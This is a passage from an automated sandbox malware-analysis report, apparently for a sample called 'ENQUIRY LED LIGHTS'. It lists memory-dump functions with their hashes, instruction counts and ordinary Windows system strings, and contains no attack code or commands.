                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: `$`
                                                                                                  • API String ID: 0-197956300
                                                                                                  • Opcode ID: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                  • Instruction ID: 89343288710222d26af269884bdfd09f76c45071788b6a585478027bf76caf46
                                                                                                  • Opcode Fuzzy Hash: f14427897cfa9f2fff493575096aafbbc27a418cd5181fa4476e78ff72e31fcd
                                                                                                  • Instruction Fuzzy Hash: 84C1C0326043459BD725CF24C841B6BBBE7AF84398F084A2DFA95CA290D775E505CF49
                                                                                                  Function 02F8E6F2 Relevance: 2.7, Strings: 2, Instructions: 179COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID: Legacy$UEFI
                                                                                                  • API String ID: 2994545307-634100481
                                                                                                  • Opcode ID: 0304f02a6b83551255a76391624b42ea80683f7f4cbbada5af93c96590bd7b9a
                                                                                                  • Instruction ID: 854f3891b3988d52c8ac521cd711d08b16b95ede4ca1b337e4cae3b5fe0fdfb3
                                                                                                  • Opcode Fuzzy Hash: 0304f02a6b83551255a76391624b42ea80683f7f4cbbada5af93c96590bd7b9a
                                                                                                  • Instruction Fuzzy Hash: 51614C72E402199FDB14EFA8C940BAEFBB5FB44784F144069EB59EB291D731A940CB50
                                                                                                  Function 02FB43D4 Relevance: 2.7, Strings: 2, Instructions: 169COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: @$MUI
                                                                                                  • API String ID: 0-17815947
                                                                                                  • Opcode ID: 7cf8819f75c0b555f7a0d73a31eb42e838882d56befe27c7da7a0b6922ca5d78
                                                                                                  • Instruction ID: fd0b55458c19304bcae40a6fa66c990faa3363ef44932140218855073e173156
                                                                                                  • Opcode Fuzzy Hash: 7cf8819f75c0b555f7a0d73a31eb42e838882d56befe27c7da7a0b6922ca5d78
                                                                                                  • Instruction Fuzzy Hash: C55118B1E0061DAEDF11DFA5CD90AEEBBB9EF48798F100529EA11B7291D7309905CB60
                                                                                                  Function 02F104E5 Relevance: 2.7, Strings: 2, Instructions: 153COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • kLsE, xrefs: 02F10540
                                                                                                  • TerminalServices-RemoteConnectionManager-AllowAppServerMode, xrefs: 02F1063D
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: TerminalServices-RemoteConnectionManager-AllowAppServerMode$kLsE
                                                                                                  • API String ID: 0-2547482624
                                                                                                  • Opcode ID: 2e7f8ac7dc31012d2598c48713c02d64e965cf7aadc9d45d689e962270ac5ab2
                                                                                                  • Instruction ID: b35bbc15085da74b8fdd2068612bdc10b462241720f68bce56c4639d7d956725
                                                                                                  • Opcode Fuzzy Hash: 2e7f8ac7dc31012d2598c48713c02d64e965cf7aadc9d45d689e962270ac5ab2
                                                                                                  • Instruction Fuzzy Hash: BD51CF71A047469FC728EF24C5407A7B7E5AF84344F40883EEA9A87240EB74E985CF92
                                                                                                  Function 02F1A2C3 Relevance: 2.6, Strings: 2, Instructions: 118COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • RtlpResUltimateFallbackInfo Enter, xrefs: 02F1A2FB
                                                                                                  • RtlpResUltimateFallbackInfo Exit, xrefs: 02F1A309
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: RtlpResUltimateFallbackInfo Enter$RtlpResUltimateFallbackInfo Exit
                                                                                                  • API String ID: 0-2876891731
                                                                                                  • Opcode ID: a354969d927312366f4babba56ebd3197e752e0a3068b7bc8f8a91902fdb6a42
                                                                                                  • Instruction ID: 4beab4d31b2d587becd40e8aa65e00e87ab41724f303478a223d5c991c35b2bd
                                                                                                  • Opcode Fuzzy Hash: a354969d927312366f4babba56ebd3197e752e0a3068b7bc8f8a91902fdb6a42
                                                                                                  • Instruction Fuzzy Hash: 3E41AC71F05659DBDB21CF69C840B6AB7B4FF85788F6440AAEE05DB291E336DA00CB50
                                                                                                  Function 02F4A5D0 Relevance: 2.5, Strings: 2, Instructions: 38COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: InitializeThunk
                                                                                                  • String ID: Cleanup Group$Threadpool!
                                                                                                  • API String ID: 2994545307-4008356553
                                                                                                  • Opcode ID: 1297998258c2e26f08681b86718fa618a1d3c9557ea7d83e414812b765246c8c
                                                                                                  • Instruction ID: 958dd30b59cd3dbf30a34a79d626b8ada70172177c915ae4a9e52f0b5e14b6ba
                                                                                                  • Opcode Fuzzy Hash: 1297998258c2e26f08681b86718fa618a1d3c9557ea7d83e414812b765246c8c
                                                                                                  • Instruction Fuzzy Hash: E501FFB2280744AFE311DF24CD45F267BE8E744B59F008939A759C7290EBB8E844CF4A
                                                                                                  Function 02F1C7C0 Relevance: 2.2, Strings: 1, Instructions: 960COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: MUI
                                                                                                  • API String ID: 0-1339004836
                                                                                                  • Opcode ID: d1aa38d45651b470aaf5eecc30b45e23ef2f966c748c32e5f1122ca1bc24e852
                                                                                                  • Instruction ID: e5fd66ab6e6bd59f9066c3cb8bf136e79e696a45b770e2f3624f261070b6e6b9
                                                                                                  • Opcode Fuzzy Hash: d1aa38d45651b470aaf5eecc30b45e23ef2f966c748c32e5f1122ca1bc24e852
                                                                                                  • Instruction Fuzzy Hash: 91827C76E002588FDB28CFA9C980BEDB7B1BF48794F54816ADA19AB390D7309D41CF51
                                                                                                  Function 02F96420 Relevance: 1.5, Strings: 1, Instructions: 264COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID: 0-3916222277
                                                                                                  • Opcode ID: b1c78af45e954b22f7059a61c0d3ea35f4187046abafc28980861136fb0ed3b4
                                                                                                  • Instruction ID: ebfc5ad2758b7ea91b3000ec906d779de4c79665a27135a8c4d93bf98644f3bc
                                                                                                  • Opcode Fuzzy Hash: b1c78af45e954b22f7059a61c0d3ea35f4187046abafc28980861136fb0ed3b4
                                                                                                  • Instruction Fuzzy Hash: 07914F72A40219ABEB21DF95CD85FAEB7B9EF09794F110065F701AB290D774AD04CFA0
                                                                                                  Function 02FBE10E Relevance: 1.5, Strings: 1, Instructions: 255COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID: 0-3916222277
                                                                                                  • Opcode ID: a38f0b40724133917419967c6eef808a59fe08b898fad2716e2a1105df2c2f70
                                                                                                  • Instruction ID: 8f927719bb5cff494c6361f7d00d53bf773bf4ff85c22162c288f9e54a3fa3ff
                                                                                                  • Opcode Fuzzy Hash: a38f0b40724133917419967c6eef808a59fe08b898fad2716e2a1105df2c2f70
                                                                                                  • Instruction Fuzzy Hash: 0791AE72E00648AADB26AFA2DC44FEFBBBAEF45784F540025F701A7250DB789945CB50
                                                                                                  Function 02F4A660 Relevance: 1.4, Strings: 1, Instructions: 200COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: GlobalTags
                                                                                                  • API String ID: 0-1106856819
                                                                                                  • Opcode ID: 99742b0e608631f0a120cc2ca1049c61d2c97aae63068e8903c1e5785c8b7e95
                                                                                                  • Instruction ID: 7d5cf184843bb175d01db4d237643984c7d632e4887de79c11e5b7073785006d
                                                                                                  • Opcode Fuzzy Hash: 99742b0e608631f0a120cc2ca1049c61d2c97aae63068e8903c1e5785c8b7e95
                                                                                                  • Instruction Fuzzy Hash: E1716175E0021ADFDF18EF98D590AADFBB6BF48784F14812AE606EB240DB719941CF50
                                                                                                  Function 02FB4978 Relevance: 1.4, Strings: 1, Instructions: 153COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .mui
                                                                                                  • API String ID: 0-1199573805
                                                                                                  • Opcode ID: 5a520df87456dcaa888c6f808737f8d2800a53c2ed2a7a6a33400ba2cfc03a8a
                                                                                                  • Instruction ID: 7d20d9f195c3dd8f634e43f7a4d9b17bf44ac3a524dce374c8fcd3c901c834a4
                                                                                                  • Opcode Fuzzy Hash: 5a520df87456dcaa888c6f808737f8d2800a53c2ed2a7a6a33400ba2cfc03a8a
                                                                                                  • Instruction Fuzzy Hash: 0851D672D002299BDF12DF9AC950AEEB7B9BF09784F054169EB15BB241D3749C01CFA4
                                                                                                  Function 02F2E627 Relevance: 1.4, Strings: 1, Instructions: 148COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: EXT-
                                                                                                  • API String ID: 0-1948896318
                                                                                                  • Opcode ID: 970d47bc4795afbe80320803f8bf420c3645596fc154f3360cdfdce27edfe0a8
                                                                                                  • Instruction ID: 89c9dc90619a85091458f049ff6bbed84668f3047a4ddd1ca80ce09496d50ab2
                                                                                                  • Opcode Fuzzy Hash: 970d47bc4795afbe80320803f8bf420c3645596fc154f3360cdfdce27edfe0a8
                                                                                                  • Instruction Fuzzy Hash: 5D41D5726083259BD710DA74C840B6BB7E9AF89B88F54092DFB95D7140E774E908CB93
                                                                                                  Function 02F8C730 Relevance: 1.4, Strings: 1, Instructions: 129COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: BinaryHash
                                                                                                  • API String ID: 0-2202222882
                                                                                                  • Opcode ID: 2d13b1ca537e4210ba76b00cc7b55bafc9ec7044813e0c680ae3d9d207eed012
                                                                                                  • Instruction ID: 16b7d7fee08d832e5b9ff96e5209b3737e4d86267d302f56d13396f2b858adc7
                                                                                                  • Opcode Fuzzy Hash: 2d13b1ca537e4210ba76b00cc7b55bafc9ec7044813e0c680ae3d9d207eed012
                                                                                                  • Instruction Fuzzy Hash: 964125B1D4052CAADB25EB60CC84F9EB77DAB45754F0045D6EB08AB140DB709E498FA4
                                                                                                  Function 02FA6B40 Relevance: 1.4, Strings: 1, Instructions: 106COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: #
                                                                                                  • API String ID: 0-1885708031
                                                                                                  • Opcode ID: 75a6810366bfb9c755ef0586b26ef800d7aaa0ba4146775ba219a97ff940c28f
                                                                                                  • Instruction ID: e54e36c12c2cc39c86dc5fe1f65d3506ae6bdc210dd2d7f2b65ae1e465911fcd
                                                                                                  • Opcode Fuzzy Hash: 75a6810366bfb9c755ef0586b26ef800d7aaa0ba4146775ba219a97ff940c28f
                                                                                                  • Instruction Fuzzy Hash: D03124B1A007589ADF22DF68CC64BAEB7ACDF05788F184068EB50EB281CB75D805CB50
                                                                                                  Function 02F8CA72 Relevance: 1.3, Strings: 1, Instructions: 94COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: BinaryName
                                                                                                  • API String ID: 0-215506332
                                                                                                  • Opcode ID: 35061f4b4bd45628248105624e7fbad273e2d683c508b70fa1e5a1015989a141
                                                                                                  • Instruction ID: 4bf96229f3ffd932aa389f4b41181d410455999ae71bfd8b1c2a07db3daab5bb
                                                                                                  • Opcode Fuzzy Hash: 35061f4b4bd45628248105624e7fbad273e2d683c508b70fa1e5a1015989a141
                                                                                                  • Instruction Fuzzy Hash: F331E376E00919AFDB19EA58CC55E6FF7B4EB807A4F01416AEB05A7290D7309E04CBF0
                                                                                                  Function 02FAAEB0 Relevance: 1.3, Strings: 1, Instructions: 89COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p, xrefs: 02FAAF2F
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: NTDLL: Calling thread (%p) not owner of CritSect: %p Owner ThreadId: %p
                                                                                                  • API String ID: 0-1911121157
                                                                                                  • Opcode ID: 81bc96ab1c8721d2c6485964052c8529fe4244aeca363b949e480f8dfa3fa8bd
                                                                                                  • Instruction ID: f7791705492690fc0d4c28fb73c5c9ada682c295c71ec2ca98ac8ca22a02de76
                                                                                                  • Opcode Fuzzy Hash: 81bc96ab1c8721d2c6485964052c8529fe4244aeca363b949e480f8dfa3fa8bd
                                                                                                  • Instruction Fuzzy Hash: 3F3129F2E00648AFDB15DF64CD45F5ABBB6FB44B54F148265FB0597680D738A804CB90
                                                                                                  Function 02F9892A Relevance: 1.3, Strings: 1, Instructions: 47COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  • AVRF: AVrfDllUnloadNotification called for a provider (%p) , xrefs: 02F9895E
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: AVRF: AVrfDllUnloadNotification called for a provider (%p)
                                                                                                  • API String ID: 0-702105204
                                                                                                  • Opcode ID: 054a8558ff3bde194a0e495ad4d5c7e63093e51a73158f2a417bd927ffa197d4
                                                                                                  • Instruction ID: d9053cc12546a12bd793eb5cce0c4534337b9ad71813368aeaadcce2ef9313b5
                                                                                                  • Opcode Fuzzy Hash: 054a8558ff3bde194a0e495ad4d5c7e63093e51a73158f2a417bd927ffa197d4
                                                                                                  • Instruction Fuzzy Hash: CC01D632705201AFFF25AB55DC9CA5A7B66FF87BD8F04012CE7411A592CB61A881CE92
                                                                                                  Function 02FB2000 Relevance: .8, Instructions: 757COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 737e1f24518ba3f7e46fcef2bcdbc23863c12e9aeaaed687fcb8abb17281dd5d
                                                                                                  • Instruction ID: 461562d81d20404f8ed67c2a4b6efb358dd19528af5da5db1118ae9b91c2a6d6
                                                                                                  • Opcode Fuzzy Hash: 737e1f24518ba3f7e46fcef2bcdbc23863c12e9aeaaed687fcb8abb17281dd5d
                                                                                                  • Instruction Fuzzy Hash: CC42D772A083419BDB26CF66C890BABB7E5BF88384F54092EFF8597250D770D845CB52
                                                                                                  Function 02FA8158 Relevance: .6, Instructions: 617COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9ac59e1de41f13f25d35dcea80921c67983e0bddb0a4d6f1abb0a35ebbeafb20
                                                                                                  • Instruction ID: b79582ce60349014c7773a0f9fa43c62ad7694f572ced639daa48c8081b9399e
                                                                                                  • Opcode Fuzzy Hash: 9ac59e1de41f13f25d35dcea80921c67983e0bddb0a4d6f1abb0a35ebbeafb20
                                                                                                  • Instruction Fuzzy Hash: 38426CB5E002198FEB24CF69C891BADB7F6BF48384F148099EA49AB241D7749D85CF50
                                                                                                  Function 02F22840 Relevance: .6, Instructions: 605COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 04303d5887785731de5b0e2616732fdf9b86ea5727c210ab7d4be7a498ab4243
                                                                                                  • Instruction ID: b160805ade1995db93010ba954e18e3b7050333e5ee5560440bd23cd56f150fa
                                                                                                  • Opcode Fuzzy Hash: 04303d5887785731de5b0e2616732fdf9b86ea5727c210ab7d4be7a498ab4243
                                                                                                  • Instruction Fuzzy Hash: C632CF70A00B558BDB24CF69C854BBEBBFABF85384F14411ED686DB684D735A806CF50
                                                                                                  Function 02FBA118 Relevance: .6, Instructions: 591COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 446806277eeb96aee363eb18510bd9df62466160439e9cb4b761d6f64e8adfc9
                                                                                                  • Instruction ID: da986caa3ecd9589fe70b4168a9e210f7acba2bc8e51fcdf192ba5d29b6d2e11
                                                                                                  • Opcode Fuzzy Hash: 446806277eeb96aee363eb18510bd9df62466160439e9cb4b761d6f64e8adfc9
                                                                                                  • Instruction Fuzzy Hash: 9822F275B04650CFDB26CF2AC0943F2B7F1AF44388F18849ADA968F686E735D552CB60
                                                                                                  Function 02F16A50 Relevance: .5, Instructions: 548COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 015d1168aa5f8e62f2d27f7359475910cc7ba0380ec65026e263604e774d3d70
                                                                                                  • Instruction ID: a34f09876fccf74d93ef8bd94635304e6e7fdae56a686d1a40b2a9fc0e262f4b
                                                                                                  • Opcode Fuzzy Hash: 015d1168aa5f8e62f2d27f7359475910cc7ba0380ec65026e263604e774d3d70
                                                                                                  • Instruction Fuzzy Hash: 8B328C71A01214CFDB24CF68C880BAAB7F6FF48344F54856AEA5AEB391D734E845CB50
                                                                                                  Function 02F34A35 Relevance: .4, Instructions: 423COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                  • Instruction ID: ef9678be6057ed1742770a8a56314d3ca4cabdcc838e662002190b757cf52af9
                                                                                                  • Opcode Fuzzy Hash: e8a3620866af67e9ba5ee0a5ffcffd4608486dc740fad13053f627f14a392904
                                                                                                  • Instruction Fuzzy Hash: 1AF15071E002199BDF16CF95D990BEEF7B6AF48798F048169EA05AB340E774DC42CB60
                                                                                                  Function 02FA892B Relevance: .4, Instructions: 386COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bcc5d6ac3e5c7775c7d043873c97d760a86e8c64c3ff68dc99923d327a6ba2f1
                                                                                                  • Instruction ID: 4b92d53c400ac66c9688b7cf8f50f4e631dd8537f9227fa6e426ef0bd384a1ad
                                                                                                  • Opcode Fuzzy Hash: bcc5d6ac3e5c7775c7d043873c97d760a86e8c64c3ff68dc99923d327a6ba2f1
                                                                                                  • Instruction Fuzzy Hash: 9DD102B2E016199BDB04CF58C861BFEB7F1BF883C4F188169DA56A7240E775E901CB60
                                                                                                  Function 02F165D0 Relevance: .4, Instructions: 383COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d8b5401ac61a44941342a2749eac2bf3e1770c20e069c3222882d983b6bfae84
                                                                                                  • Instruction ID: 25cc33bcb9ecffaa1a3ece48f0f2de1dc1ae36f33ca19200ef4e3dcddabce3dc
                                                                                                  • Opcode Fuzzy Hash: d8b5401ac61a44941342a2749eac2bf3e1770c20e069c3222882d983b6bfae84
                                                                                                  • Instruction Fuzzy Hash: 15E18C71A08341CFC714CF28C490A6ABBE5BF89394F85896DEA99CB351DB31E905CF91
                                                                                                  Function 02F08397 Relevance: .4, Instructions: 380COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b4be26b93b7af08592c3dc7476ecf62781cc0a33bbb4020f4a77a08892820ddc
                                                                                                  • Instruction ID: 87d775b7d90eec660748b026b066557e93cf6ecaf053d625522824d164099ed8
                                                                                                  • Opcode Fuzzy Hash: b4be26b93b7af08592c3dc7476ecf62781cc0a33bbb4020f4a77a08892820ddc
                                                                                                  • Instruction Fuzzy Hash: F1D1A472A0061A9BCB14DF64CCD0ABA73A5EF443D8F054669EB15EB2C0EB34E945DF50
                                                                                                  Function 02F98243 Relevance: .3, Instructions: 322COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000003.00000002.2069312956.0000000002EE0000.00000040.00001000.00020000.00000000.sdmp, Offset: 02EE0000, based on PE: true
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_3_2_2ee0000_ENQUIRY LED LIGHTS.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                  • Instruction ID: 587753bf5fd1a3f80846d70e898c6ec01b53a8c4277aac04df41ccd0502dbdbf
                                                                                                  • Opcode Fuzzy Hash: c58da6bef63a17e65f3132630e1fabe04f2e2fb92a18dec9866503995c4710af
                                                                                                  • Instruction Fuzzy Hash: 3EB15375A006049FEF24DF95C940EABB7B6BF863C4F104469AA42E7790DB35ED49CB10
                                                                                                  Function 02F20535 Relevance: .3, Instructions: 300COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
